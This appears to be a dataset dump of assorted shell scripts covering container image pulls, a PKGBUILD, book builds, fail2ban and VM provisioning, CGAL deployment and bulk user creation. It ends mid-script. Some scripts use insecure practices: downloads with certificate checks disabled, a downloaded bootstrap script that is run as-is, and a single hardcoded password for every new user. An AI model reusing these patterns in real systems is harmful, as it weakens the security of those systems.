blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
daf29692535accdd35a15ee7f71a25d61f87ab38
|
Shell
|
olberger/Labtainers
|
/setup_scripts/pull-all.sh
|
UTF-8
| 797
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
#
# pull the baseline labtainer images from the appropriate registry
# NOTE use of environment variable TEST_REGISTRY
# Script assumes the pwd is the parent of the labtainer directory
# Intended to be called from update-labtainer.sh
#
# Select the registry: the test registry when TEST_REGISTRY=TRUE or -t is
# given, otherwise the default registry; both come from labtainer.config.
if [ "$TEST_REGISTRY" = TRUE ] || [ "$1" = -t ]; then
    registry=$(grep TEST_REGISTRY ../config/labtainer.config | tr -s ' ' | cut -d ' ' -f 3)
else
    registry=$(grep DEFAULT_REGISTRY ../config/labtainer.config | tr -s ' ' | cut -d ' ' -f 3)
fi
# Guard against a missing/garbled config: pulling from an empty registry
# string would silently pull "/labtainer.base" from the default hub.
if [ -z "$registry" ]; then
    echo "error: could not determine registry from ../config/labtainer.config" >&2
    exit 1
fi
echo "pull from $registry"
# Pull every baseline image; report failure if any single pull fails
# (the original ignored individual pull errors and always exited 0).
status=0
for image in base network firefox wireshark java centos lamp; do
    docker pull "$registry/labtainer.$image" || status=1
done
exit $status
| true
|
80404c622eaa71b8d77d1be13a608b2304580d1c
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/cjdns-git-sysvinit/PKGBUILD
|
UTF-8
| 767
| 2.8125
| 3
|
[] |
no_license
|
# Maintainer: Prurigro
# PKGBUILD: packages a legacy sysvinit service for the cjdns-git package.
pkgname=cjdns-git-sysvinit
pkgver=20140626.r12.dda687c
pkgrel=1
pkgdesc="Legacy sysvinit (rc.d/init.d) service for the cjdns-git package"
url="https://github.com/prurigro/${pkgname}"
license=('GPL2')
arch=('any')
depends=('cjdns-git' 'bash')
makedepends=('git')
source=("git://github.com/prurigro/${pkgname}.git#branch=master")
sha512sums=('SKIP')
# Derive the VCS version as <commit-date>.r<commit-count>.<short-hash>:
# the date comes from `git show`'s committer date with time/dashes stripped.
pkgver() {
cd $pkgname
printf "%s.r%s.%s" "$(git show -s --format=%ci master | sed 's/\ .*//g;s/-//g')" "$(git rev-list --count HEAD)" "$(git rev-parse --short HEAD)"
}
# Install the service files into the package root ($pkgdir):
# defaults file, launcher script, and the rc.d init script.
package() {
install -Dm644 ${pkgname}/cjdns "${pkgdir}"/etc/default/cjdns
install -Dm755 ${pkgname}/cjdns.sh "${pkgdir}"/usr/bin/cjdns.sh
install -Dm755 ${pkgname}/cjdns.rc.d "${pkgdir}"/etc/rc.d/cjdns
}
| true
|
bb657c0f04f0ac4577b105510a695c492bbe2081
|
Shell
|
SquareBracketAssociates/DeepIntoPharo
|
/build-chapters-and-upload.sh
|
UTF-8
| 1,193
| 3.75
| 4
|
[] |
no_license
|
#!/bin/bash
# Check out the PharoByExampleTwo book from SVN, compile every chapter with
# pdflatex, then upload the PDFs to a dated directory on the web server and
# repoint the "latest" symlink at it.
TEMP_DIR=/tmp
SVN_REPO=svn+ssh://scm.gforge.inria.fr/svn/pharobooks
REMOTE_SERVER=scm.gforge.inria.fr
REMOTE_PATH=/home/groups/pharobooks/htdocs
# NOTE(review): REMOTE is never used below (REMOTE_SERVER/REMOTE_PATH are
# used separately in the ssh command) — candidate for removal.
REMOTE=$REMOTE_SERVER:$REMOTE_PATH
BOOK=PharoByExampleTwo-Eng
DOWNLOAD_URL=http://pharobooks.gforge.inria.fr/PharoByExampleTwo-Eng
# Fresh checkout: remove any previous working copy first.
cd $TEMP_DIR
rm -rf $BOOK
svn co $SVN_REPO/$BOOK
cd $BOOK
# Extract the chapter paths from \input{...} lines of the master file,
# skipping the shared common.tex preamble.
chapters=$(cat PBE2.tex | grep '^\\input' | grep -v common.tex | sed -e 's/^\\input{\([^}]*\)}.*$/\1/')
# First try to compile all chapters before uploading anything
for chapter in $chapters; do
echo ======================================================================
echo COMPILING $chapter
echo ======================================================================
file=$(basename $chapter)
cd $(dirname $chapter)
# Run pdflatex twice so cross-references resolve.
pdflatex $file
pdflatex $file
cd ..
done
# Stage the generated PDFs under tmp/ and upload them into a directory named
# after the current UTC timestamp.
upload_id=$(date -u +%F_%T)
files_to_upload=$(echo $chapters | sed 's/\.tex/.pdf/g')
mkdir tmp
mv $files_to_upload tmp/
cd tmp
echo
echo "Uploading to $DOWNLOAD_URL..."
echo
# Stream the PDFs over ssh; on the remote side unpack into the dated
# directory and atomically-ish swap the "latest" symlink.
tar vcf - *.pdf | \
ssh $USER@$REMOTE_SERVER \
"cd $REMOTE_PATH/$BOOK; mkdir $upload_id; cd $upload_id; tar vxf -; cd ..; unlink latest; ln -s $upload_id latest"
| true
|
96a71eb99728fbb12d9f90a8d931569551e1c201
|
Shell
|
izenecloud/ijma
|
/bin/smoke_test/diff.sh
|
UTF-8
| 504
| 3.53125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Compare smoke-test output with the gold (expected) files.
GOLD_DIR=smoke_test/gold
OUTPUT_DIR=smoke_test/output
# option "-w" to ignore white space different between Linux and Win32.
diff -qw "${GOLD_DIR}" "${OUTPUT_DIR}"
# check multi-thread results: every per-thread output file must match the
# single gold stream result.
MULTI_DIR=smoke_test/multithread
GOLD_FILE=${GOLD_DIR}/result_jma_run_stream.utf8
THREAD_NUM=100
count=0
# Read NUL-delimited find output so unusual file names cannot word-split
# (the original `for file in \`find ${MULTI_DIR}/*\`` split on whitespace).
while IFS= read -r -d '' file; do
    diff -qw "${GOLD_FILE}" "${file}"
    count=$((count + 1))
done < <(find "${MULTI_DIR}" -mindepth 1 -print0)
# Numeric comparison (-ne) instead of the original string compare (!=).
if [ "$count" -ne "$THREAD_NUM" ]
then
    echo "error: $THREAD_NUM threads output only $count results." >&2
fi
| true
|
45340626d4e4f67448d48ab9d323238f8cbe133e
|
Shell
|
mareksapota/dotfiles
|
/x/xmonad/scripts/on_restart.sh
|
UTF-8
| 481
| 3.203125
| 3
|
[
"LicenseRef-scancode-public-domain"
] |
permissive
|
#!/bin/bash
# xmonad restart hook: invoked with "before" just before a restart (kill the
# managed programs) and with "after" once xmonad is back up (relaunch them).
stage=$1

# Kill the named program before a restart; relaunch it (detached, silenced)
# afterwards. Any other stage value is a no-op.
run()
{
    case "$stage" in
        before) killall "$1" ;;
        after)  nohup "$@" &> /dev/null & ;;
    esac
}

# Kill the named program before a restart but never relaunch it.
stop()
{
    case "$stage" in
        before) killall "$1" ;;
    esac
}

run nm-applet
run parcellite
run xscreensaver
stop xmobar

if [[ "$stage" = "after" ]]; then
    ~/.xmonad/scripts/setbg.sh
    # Make the arrow cursor default instead of the "X" one.
    xsetroot -cursor_name left_ptr
fi
| true
|
c639ec55728b893281d93b4a5fe44a176a0114b1
|
Shell
|
benzBrake/Shell_Collections
|
/fail2ban/fail2ban.sh
|
UTF-8
| 4,404
| 3.703125
| 4
|
[] |
no_license
|
#!/bin/sh
#
# Onekey install script for fail2ban
# Author: Char1sma
# Email: github-char1sma@woai.ru
MIN_CENTOS_VER=5
MIN_DEBIAN_VER=6
MIN_UBUNTU_VER=12
# Detect the sshd listen port from netstat output.
# The final sed strips every non-digit character; the original 's/[^1-9]//'
# removed only the FIRST non-[1-9] character, so any '0' inside the port
# number (e.g. 10022) was silently deleted instead of punctuation.
SSH_PORT=$(netstat -ntlp|grep sshd |awk -F: '{if($4!="")print $4}' | head -n 1 | sed 's/[^0-9]//g')
# Detect the distribution (sets OS to CentOS/Ubuntu/Debian) and its major
# version (sets OS_VSRSION); exits 1 on anything unsupported.
# NOTE(review): `if $(grep -q ...)` works only by accident — the substitution
# expands to nothing and the shell then uses the substitution's exit status;
# the conventional form is plain `if grep -q ...`.
linux_check(){
if $(grep -qi "CentOS" /etc/issue) || $(grep -q "CentOS" /etc/*-release); then
OS="CentOS"
elif $(grep -qi "Ubuntu" /etc/issue) || $(grep -q "Ubuntu" /etc/*-release); then
OS="Ubuntu"
elif $(grep -qi "Debian" /etc/issue) || $(grep -q "Debian" /etc/*-release); then
OS="Debian"
else
cat >&2 <<-EOF
This shell only support CentOS ${MIN_CENTOS_VER}+, Debian ${MIN_DEBIAN_VER}+ or Ubuntu ${MIN_UBUNTU_VER}+, if you want to run this shell on other system, please write shell by yourself.
EOF
exit 1
fi
# First number found in the release files is taken as the major version.
OS_VSRSION=$(grep -oEh "[0-9]+" /etc/*-release | head -n 1) || {
cat >&2 <<-'EOF'
Fail to detect os version, please feed back to author!
EOF
exit 1
}
}
# Install fail2ban for the detected distribution, then download this script
# itself to ~/bin/fb.sh for later management (showlog/uninstall/...).
install(){
# Already installed (fb.sh present) -> bail out with status 1.
[ ! -f ~/bin/fb.sh ] || exit 1
linux_check
# LOG_PATH is the auth log fail2ban should watch; it is substituted into
# the jail configuration by the per-distro installers / write_conf.
if [ "$OS" = "CentOS" ]; then
LOG_PATH="/var/log/secure"
centos_install
elif [ "$OS" = "Debian" ]; then
LOG_PATH="/var/log/auth.log"
debian_install
else
LOG_PATH="/var/log/auth.log"
ubuntu_install
fi
# Self-install this management script as ~/bin/fb.sh.
[ -d ~/bin ] || mkdir -p ~/bin
wget --no-check-certificate https://raw.githubusercontent.com/Char1sma/Shell_Collections/master/fail2ban/fail2ban.sh -O ~/bin/fb.sh
chmod +x ~/bin/fb.sh
}
# Download the packaged fail2ban configuration tarball into /etc/fail2ban and
# substitute the detected SSH port and log path into jail.conf.
write_conf() {
[ -d /etc/fail2ban ] || mkdir -p /etc/fail2ban
cd /etc/fail2ban
# Stream the tarball straight into tar (no temp file).
wget --no-check-certificate https://raw.githubusercontent.com/Char1sma/Shell_Collections/master/fail2ban/fail2ban.tar.gz -O- | tar -zxvf -
# Replace the SSH_PORT / LOG_PATH placeholders in the shipped config.
sed -i "s%SSH_PORT%$SSH_PORT%g" /etc/fail2ban/jail.conf
sed -i "s%LOG_PATH%$LOG_PATH%g" /etc/fail2ban/jail.conf
unset LOG_PATH
# fail2ban expects its runtime socket directory to exist.
[ -d /var/run/fail2ban ] || mkdir -p /var/run/fail2ban
}
# CentOS: enable EPEL, install fail2ban, fetch the CentOS jail.local and
# substitute the placeholders, then (re)start via systemd or SysV depending
# on the major version.
centos_install(){
rpm -ivh "https://dl.fedoraproject.org/pub/epel/epel-release-latest-$OS_VSRSION.noarch.rpm"
yum -y install fail2ban
[ -d /var/run/fail2ban ] || mkdir -p /var/run/fail2ban
wget --no-check-certificate https://raw.githubusercontent.com/Char1sma/Shell_Collections/master/fail2ban/jail.local.centos -O /etc/fail2ban/jail.local
sed -i "s%SSH_PORT%$SSH_PORT%g" /etc/fail2ban/jail.local
sed -i "s%LOG_PATH%$LOG_PATH%g" /etc/fail2ban/jail.local
# CentOS 7+ uses systemd; 6 and below use service/chkconfig.
if [ "$OS_VSRSION" -gt 6 ]; then
systemctl restart fail2ban
systemctl enable fail2ban
else
service fail2ban restart
chkconfig fail2ban on
fi
}
# Debian/Ubuntu: install fail2ban via apt, write the jail config, and start
# the service. Debian 6 (squeeze) is EOL, so its sources must be pointed at
# archive.debian.org first.
debian_install(){
if [ "$OS_VSRSION" -lt 7 ]; then
# Archived releases have expired Release files; skip the validity check.
echo 'Acquire::Check-Valid-Until "false";' >/etc/apt/apt.conf.d/90ignore-release-date
echo "deb http://archive.debian.org/debian-archive/debian squeeze main" > /etc/apt/sources.list
echo "deb http://archive.debian.org/debian-archive/debian squeeze-proposed-updates main" >> /etc/apt/sources.list
echo "deb http://security.debian.org squeeze/updates main" >> /etc/apt/sources.list
echo "deb http://archive.debian.org/debian-archive/debian squeeze-lts main contrib non-free" >> /etc/apt/sources.list
#install gpg key
apt-get -y install debian-archive-keyring
fi
apt-get -y update
apt-get -y install fail2ban
write_conf
service fail2ban start
update-rc.d fail2ban enable
}
# Ubuntu uses the same apt-based procedure as Debian.
ubuntu_install(){
debian_install
}
# Print one "user<TAB>ip" line per failed SSH login attempt found in the
# distro's auth log, followed by a "SUM:<n>" total.
show_log(){
linux_check
echo "Line UserName IP"
# Pick the log source per distro, then feed one stream into the parser.
if [ "$OS" = "CentOS" ]
then
cat /var/log/secure*
else
cat /var/log/auth.log
fi | grep 'Failed password' | awk 'BEGIN{sum=0;}{sum ++;if ($9 == "invalid") { print $11 "\t" $13 } else { print $9 "\t" $11; }}END{ print "SUM:" sum}'
}
# Remove the fail2ban package plus every file this installer created.
uninstall() {
linux_check
case "$OS" in
CentOS) yum -y remove fail2ban\* ;;
*) apt-get -y remove fail2ban ;;
esac
rm -rf /etc/fail2ban/
rm -rf /var/run/fail2ban/
rm -rf ~/bin/fb.sh
}
# Abort with status 1 unless running with effective UID 0 (root).
root_check() {
[ "$(id -u)" -eq 0 ] && return
echo "Error:This script must be run as root!" 1>&2
exit 1
}
#root_check
# Command dispatcher.
case $1 in
h|H|help)
echo "Usage: $0 [OPTION]"
echo ""
echo "Here are the options:"
echo "install install fail2ban"
echo "uninstall uninstall fail2ban"
echo "showlog show failed login logs"
;;
unban)
# NOTE(review): no unban() function is defined anywhere in this script, so
# the original `unban "$2"` died with "command not found" and still exited 0.
# Report the missing feature explicitly until it is implemented.
echo "$0 : 'unban' is not implemented" >&2
exit 1
;;
showlog)
show_log;;
install)
install;;
uninstall)
uninstall;;
*)
echo "$0 : invalid option -- '$1'"
echo "Try '$0 help' for more infomation."
# An unrecognised option is an error: exit non-zero (the original exited 0).
exit 1;;
esac
| true
|
ff9033c7298bef01058bb2fd01f14bc882eba3f4
|
Shell
|
theKono/orchid
|
/deploy/notification/after_install.sh.tmpl
|
UTF-8
| 455
| 3.21875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# After application is copied to final destination folder
#
# Repoint /srv/<name>/current at the freshly deployed release directory and
# restart the matching supervisor program. The "-dev" variants are selected
# for the Development deployment group.
if [[ "$DEPLOYMENT_GROUP_NAME" == "Development" ]]; then
    name=notification-writer-dev
    supervisor_prog=notification-writer-dev
else
    name=notification-writer
    supervisor_prog=notification-writer
fi
# {{tag}} is substituted by the deploy tooling (this file is a .tmpl).
new_release_dir=/srv/$name/release/{{tag}}
# Abort if the release was never copied; the original continued and repointed
# the "current" symlink at a non-existent directory.
cd "$new_release_dir" || exit 1
rm -f "/srv/$name/current"
ln -s "$new_release_dir" "/srv/$name/current"
supervisorctl restart "$supervisor_prog"
| true
|
aa87d96ec2b7e40ebbbc8feb8712892ce057932e
|
Shell
|
sung1011/meepo
|
/init.sh
|
UTF-8
| 1,080
| 3.546875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#! /bin/bash
# ==================== const
# install root for the tools managed by this script
CRACK_PATH="/usr/local/crack/"
# package/source download directory
CRACK_PKG_PATH="/usr/local/crack/pkg/"
# directory where binaries are symlinked onto PATH
CRACK_BIN_PATH="/usr/local/bin/"
# go version
GO_VER="1.15.6"
# ==================== func
# isCmdExist CMD — succeed (return 0) when CMD is found on PATH, return 2
# when it is missing, return 1 on usage error.
#
# Fixes an inversion in the original, which returned 0 when the command was
# MISSING and 2 when it existed — so every `if ! isCmdExist x; then install`
# check below reinstalled tools that were present and skipped absent ones.
# Also uses the portable `command -v` instead of `which`.
function isCmdExist() {
    local cmd="$1"
    if [ -z "$cmd" ]; then
        echo "Usage isCmdExist yourCmd"
        return 1
    fi
    if ! command -v "$cmd" >/dev/null 2>&1;
    then
        return 2
    fi
    return 0
}
# ==================== install
# -------- dir
mkdir -p "$CRACK_PATH"
mkdir -p "$CRACK_PKG_PATH"
# -------- go
# Install Go when isCmdExist reports it is not usable on this machine.
if ! isCmdExist go; then
# download golang
curl -sL https://golang.org/dl/go"$GO_VER".linux-amd64.tar.gz > /tmp/go"$GO_VER".tar.gz
# install golang
tar -zxvf /tmp/go"$GO_VER".tar.gz -C "$CRACK_PATH"
# link bin
ln -s "$CRACK_PATH"go/bin/go "$CRACK_BIN_PATH"
fi
# export GOPATH=$HOME/go
# export PATH=$PATH:$GOPATH/bin
# -------- git
# NOTE(review): yum-only — this script assumes a RHEL/CentOS-family host.
if ! isCmdExist git; then
# install
yum install -y git
fi
# -------- meepo
# install
go get -u -v github.com/sung1011/meepo
|
248b1ed70c0f521ffdcd5b09d27346bedc6ff3a6
|
Shell
|
MichaelFoss/octo-merge
|
/make_octo_txt.sh
|
UTF-8
| 399
| 3.703125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Create the file that will be octo-merged
# If it exists, nothing will happen besides changing the modified date
touch octo_test.txt
# Empty the contents of the file
cp /dev/null octo_test.txt
# Add n lines to the file
# Format of line is:
# "This is line 1 _"
#
# A C-style loop replaces the original `for i in $(eval echo "{1..$1}")`:
# eval on user input is an injection hazard, and brace expansion silently
# yielded the literal token "{1..}" when no argument was supplied.
# A missing argument now simply produces an empty file.
n=${1:-0}
for (( i = 1; i <= n; i++ ))
do
echo "This is line $i _" >> octo_test.txt;
echo -e "\n" >> octo_test.txt;
done
| true
|
9231be6ef69d156e2f5bf141ae1a64b70b84dc63
|
Shell
|
ucam-cl-dtg/dtg-puppet
|
/modules/dtg/files/vm-boot.sh
|
UTF-8
| 3,029
| 3.6875
| 4
|
[] |
no_license
|
#! /bin/bash
### BEGIN INIT INFO
# Provides: dtg-vm
# Required-Start: $local_fs $remote_fs
# Required-Stop: $local_fs $remote_fs
# Should-Start: $named
# Default-Start: 2 3 4 5
# Default-Stop:
# Short-Description: DTG vm properties
# Description: Apply puppet on VM start
### END INIT INFO
# Boot-time init script for DTG Xen VMs: prepares the data disk, keeps apt
# and the puppet config fresh, and (re)provisions SSH access for dom0 on
# freshly cloned "puppy"/"ubuntu" machines.
PUPPETBARE=/etc/puppet-bare
BOOTSTRAP="https://raw.github.com/ucam-cl-dtg/dtg-puppet/master/modules/dtg/files/bootstrap.sh"
AUTHORIZED_KEYS="/root/.ssh/authorized_keys"
DOM0_PUBLIC_KEY="ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAujx2sop6KNPYr6v/IWEpFITi964d89N3uVowvRo3X5f9a7fiquEphaXIvrMoF74TtmWe78NybfPPgKgTdmaBWYxhbykO7aC9QeY+iDcQqKWrLFlBAbqJ6GYJYfiSM0DZbmAXiAuguNhX1LU51zPRVKYf2/yAgCmJv2yammXppwCE+BJvBVqJziy2Cs0PKhI/26Altelc2tH+SMIlF9ZuSKCtAcyMTPQxTVrJ/zilmceh/U3LcLD3OlOD7XfHxUQ+fiH0KZ27dja6mnsb/OAvmqpmD8mYZs2vTUiFRH9V6HmQqQRO82a6XRRK6wHcGnh+J7JW45dO75lmtBElw1djyw== root@husky0.dtg.cl.cam.ac.uk"
# Timestamp file apt's periodic job touches after a successful update.
APT_TS=/var/lib/apt/periodic/update-success-stamp
# if there is a /dev/xvdb without partitions, let's use it
mounted=$(mount | grep /dev/xvdb)
if [ -e /dev/xvdb ] && [ ! -e /dev/xvdb1 ] && [[ -z $mounted ]]; then
echo "Creating a filesystem on /dev/xvdb"
mkfs.ext4 /dev/xvdb
echo "/dev/xvdb /local/data ext4 defaults,errors=remount-ro 0 1" >> /etc/fstab
if [ ! -d /local/data ]; then
mkdir -p /local/data
fi
mount -a
fi
# If we have a cache partition on /dev/xvda then remove it. We want to move
# to a partitionless world.
sed -i '/swap/d' /etc/fstab
fdisk -l | grep swap | grep xvda5 > /dev/null
if [ $? -eq 0 ]; then
parted -s /dev/xvda rm 5
fi
# Find the time since apt-get last successfully updated.
now=$(date +"%s")
last_apt=0
if [ -f ${APT_TS} ]; then
last_apt=$(stat -c %Y ${APT_TS})
fi
diff=$((now-last_apt))
# More than a day (86400 s) since the last successful update?
if [[ $diff -gt 86400 ]]; then
# As apt hasn't been run successfully for more than a day, the machine
# has probably been shutdown for a while, so apply latest updates and
# run puppet.
# We don't run this on every boot or else a boot storm kills
# performance.
apt-get update
apt-get -y --no-install-recommends dist-upgrade
apt-get -y autoremove
if [ -d $PUPPETBARE ]; then
# Get the latest puppet config from code.dtg if we have already
# applied puppet to this machine.
cd /etc/puppet-bare
git fetch --quiet git://github.com/ucam-cl-dtg/dtg-puppet.git
./hooks/post-update
fi
fi
# First boot (no puppet checkout yet): fetch and run the bootstrap script.
if [ ! -d $PUPPETBARE ]; then
wget $BOOTSTRAP
chmod +x bootstrap.sh
./bootstrap.sh | tee --append /var/log/bootstrap.log
fi
# if the hostname is puppy* (or ubuntu) then we want to import dom0's key so
# scripts can SSH in and sort this out. We don't want dom0 to
# monkeysphere. We also generate a new fingerprint
if echo "$HOSTNAME" | grep -q puppy || [ "$HOSTNAME" = "ubuntu" ]; then
rm -rf /etc/ssh/ssh_host_*
ssh-keygen -t ed25519 -h -f /etc/ssh/ssh_host_ed25519_key < /dev/null
ssh-keygen -t rsa -b 4096 -h -f /etc/ssh/ssh_host_rsa_key < /dev/null
mkdir -p /root/.ssh/
echo "${DOM0_PUBLIC_KEY}" >> $AUTHORIZED_KEYS
# Special-case one known MAC address: reset the hostname to "dhcp" and
# re-run the puppet post-update hook.
if [ "$(ifconfig eth0 | grep -Eo "..(:..){5}")" = "00:16:3e:e8:14:24" ]; then
echo dhcp > /etc/hostname
# NOTE(review): `start hostname` looks like an upstart job invocation —
# confirm this still applies on systemd-based releases.
start hostname
cd /etc/puppet-bare
./hooks/post-update
fi
monkeysphere-authentication update-users
else
# Named (non-clone) machine: revoke dom0's key, lock root's password, and
# fix up any leftover puppy* entries in /etc/hosts.
sed -i "\_${DOM0_PUBLIC_KEY}_d" $AUTHORIZED_KEYS
passwd -l root
sed -i "s/puppy[0-9]*/$HOSTNAME/g" /etc/hosts
fi
| true
|
33695243009e62636b943c015054e6cc4eaae425
|
Shell
|
SouthAfricaDigitalScience/cgal-deploy
|
/deploy.sh
|
UTF-8
| 1,389
| 3.421875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash -e
# this should be run after check-build finishes.
# Build and install CGAL into the module tree, then emit an environment
# modulefile for it. Relies on CI-provided env vars: WORKSPACE, NAME,
# VERSION, BUILD_NUMBER, GCC_VERSION, OPENMPI_VERSION, SOFT_DIR, LIBRARIES,
# ZLIB_DIR.
. /etc/profile.d/modules.sh
module add deploy
module add cmake
module add zlib
module add lapack/3.7.0-gcc-${GCC_VERSION}
module add boost/1.63.0-gcc-${GCC_VERSION}-mpi-${OPENMPI_VERSION}
cd ${WORKSPACE}/${NAME}-${VERSION}/build-${BUILD_NUMBER}
echo "All tests have passed, will now build into ${SOFT_DIR}"
# NOTE(review): this `rm -rf` has NO operand, so it is a silent no-op —
# presumably a target (old build artefacts?) was lost in an edit; confirm
# what was meant to be removed.
rm -rf
cmake ../ -G"Unix Makefiles" \
-DCMAKE_INSTALL_PREFIX=${SOFT_DIR}-gcc-${GCC_VERSION} \
-DWITH_LAPACK=ON \
-DWITH_ZLIB=ON \
-DZLIB_INCLUDE_DIR=${ZLIB_DIR}/include \
-DZLIB_LIBRARY_RELEASE=${ZLIB_DIR}/lib/libz.so
make install
echo "Creating the modules file directory ${LIBRARIES}"
mkdir -p ${LIBRARIES}/${NAME}
# Write the modulefile; $-variables expand now, $::env(...) is Tcl evaluated
# later by the module system.
(
cat <<MODULE_FILE
#%Module1.0
## $NAME modulefile
##
proc ModulesHelp { } {
puts stderr " This module does nothing but alert the user"
puts stderr " that the [module-info name] module is not available"
}
module-whatis "$NAME $VERSION : See https://github.com/SouthAfricaDigitalScience/CGAL-deploy"
setenv CGAL_VERSION $VERSION
setenv CGAL_DIR $::env(CVMFS_DIR)/$::env(SITE)/$::env(OS)/$::env(ARCH)/$NAME/$VERSION-gcc-${GCC_VERSION}
prepend-path LD_LIBRARY_PATH $::env(CGAL_DIR)/lib
setenv CFLAGS "-I$::env(CGAL_DIR)/include $CPPFLAGS"
setenv LDFLAGS "-L$::env(CGAL_DIR)/lib ${LDFLAGS}"
MODULE_FILE
) > ${LIBRARIES}/${NAME}/${VERSION}
| true
|
e68beca30b0ffe07fcd705f241ab6b337afe5c12
|
Shell
|
alan-turing-institute/s3ToAzure
|
/parallel_download.sh
|
UTF-8
| 787
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/bash
# Split a list of files across N workers and launch one detached screen
# session per chunk running s3ToAzure.sh.
#
# Options:
#   -i  file containing the list of files to transfer
#   -w  number of parallel workers
#   -n  Azure storage account name
#   -k  Azure storage account key
#   -c  Azure container name
#
# Fixes vs. original: the optstring lacked a colon after 'c', so -c never
# captured its argument; and -i stored into "fileslist" while every later
# use read "$filelist", so the input list was always empty.
while getopts i:w:n:k:c: option
do
case "${option}"
in
i) filelist=${OPTARG};;
w) workers=${OPTARG};;
n) azure_storage_name=${OPTARG};;
k) azure_storage_key=${OPTARG};;
c) azure_container_name=$OPTARG;;
esac
done
lines=$(wc -l < "$filelist")
files_per_worker=$((lines / workers))
directory="tmp"
# Create directory if not exist
mkdir -p $directory
# Remove everything in temporary directory (-f: no error when already empty)
rm -f $directory/*
split -l "$files_per_worker" "$filelist" $directory/files_list
files=$(ls $directory)
# One detached screen session per chunk, named after the chunk file.
for file in $files; do
screen -dmS $file ./s3ToAzure.sh -filelist $directory/$file -azure_storage_name $azure_storage_name -azure_container_key $azure_storage_key -azure_container_name $azure_container_name
done
screen -ls
| true
|
fe043ba186748fdf54215c65e2699a55415eaf2a
|
Shell
|
postmanlabs/sails-mysql-transactions
|
/scripts/postinstall.sh
|
UTF-8
| 2,084
| 3.796875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# npm postinstall hook: replaces the host project's waterline with the
# patched copy bundled inside sails-mysql-transactions. Expects to run from
# node_modules/sails-mysql-transactions (hence the ../.. paths).
INFO="sails-mysql-transactions:"; # for console logs
set -e;
# If this is an NPM installation, we do not expect `.gitmodules` in the directory
# since it is ignored by `.npmignore`. This is a fairly robust check to test whether
# this script has been run as part of npm install or as part of self install.
if [ -f ".gitmodules" ]; then
echo "${INFO} Not an NPM install, exiting waterline injection.";
exit 0;
fi;
# Check whether sails has been already installed or not. If not, this is an
# error and we should not proceed.
if [ ! -d "../../node_modules/sails" ] && [ ! -d "../../node_modules/waterline" ]; then
echo -e "\033[1;31m";
echo "${INFO} Sails and waterline installation not found!";
echo "${INFO} Ensure your package.json, which has sails-mysql-transaction, also includes sails.";
echo -e "\033[0m\n";
exit 1;
fi
# Warn (but continue) when the stock sails-mysql adapter is also present.
if [ ! -d "../../node_modules/waterline" ] && [ -d "../../node_modules/sails-mysql" ]; then
echo -e "\033[1;31m";
echo "${INFO} WARNING - detected sails-mysql.";
echo "${INFO} You may face unexpected behaviour.";
echo "${INFO} Preferably remove sails-mysql from packages before using this in production.";
echo -e "\033[0m\n";
fi
# most likely npm3
# npm3 hoists waterline to the project root: replace it there, and also strip
# any nested copy inside sails itself.
if [ -d "../../node_modules/waterline" ]; then
echo "${INFO} Injecting waterline into sails...";
pushd "../../" > /dev/null;
npm remove waterline;
npm install "node_modules/sails-mysql-transactions/waterline";
if [ -d "node_modules/sails/node_modules/waterline" ]; then
pushd "node_modules/sails" > /dev/null;
npm remove waterline;
popd > /dev/null;
fi
popd > /dev/null;
echo
echo "${INFO} Installation successful.";
echo
exit 0;
fi
# npm2 layout: waterline lives inside sails — replace it there.
if [ -d "../../node_modules/sails" ]; then
echo "${INFO} Injecting waterline into sails...";
pushd "../../node_modules/sails" > /dev/null;
npm remove waterline;
npm install "../sails-mysql-transactions/waterline";
popd > /dev/null;
echo
echo "${INFO} Installation successful.";
echo
exit 0;
fi
| true
|
d53593a4469852ce873003cbde20b24737635c52
|
Shell
|
ronban/mfa-secman
|
/mfa/utils/read-root-pwd.sh
|
UTF-8
| 341
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
# Fetch the stored root password for an AWS account from Secrets Manager.
# (Original shebang was "# !/bin/bash" — a plain comment, not a shebang.)
read -p "Please enter the AWS region: " region
read -p "Please enter the account number: " accountnumber
# NOTE(review): the original wrote the never-prompted-for $password into
# $TMPDIR/root_password.json and deleted it again; that dead (and briefly
# secret-leaking) code has been removed.
# jq needs the '.SecretString' field filter — bare 'SecretString' is not a
# valid jq program.
aws --region "$region" secretsmanager \
    get-secret-value --secret-id "rootpwd_$accountnumber" \
    | jq -r '.SecretString'
| true
|
277bdfa3dddab2816f4baf8b1a531fae1be6ef2a
|
Shell
|
Prabhurajn/shellscript_create_linuxusers
|
/sysuser.sh
|
UTF-8
| 753
| 3.71875
| 4
|
[] |
no_license
|
#!/bin/bash
# Bulk-create Linux users from a file with one username per line; results
# are appended to ./successcreate and ./failedcreate. Must run as root.
read -p "Enter File name:" fl
count=0;
# Default password assigned to every created account.
paswd="sicsr123"
if [ -e $fl ]
then
line=`wc -l < $fl`;
# Walk the file line by line (head -n N | tail -1 picks line N).
while [ $count -lt $line ]
do
let count++;
users=`head -n $count $fl | tail -1 `
if [ $(id -u) -eq 0 ]; then
# Skip-or-abort check: does the user already exist in /etc/passwd?
grep "^$users" /etc/passwd > /dev/null
if [ $? -eq 0 ]; then
echo "$users exist";
# NOTE(review): exit 1 aborts the WHOLE batch on the first existing
# user — `continue` may have been intended here.
exit 1;
else
# Hash the default password with crypt() so useradd -p gets a hash.
pass=$(perl -e 'print crypt($ARGV[0],"password")' $paswd)
useradd -m -p $pass $users -s /bin/bash
[ $? -eq 0 ] && echo "$users has been added to system" >> successcreate || echo "Failed to add $users" >> failedcreate;
fi
else
echo "Only root can add";
exit 2;
fi
done
echo "Please Check the status in successcreate and failedcreate files";
else
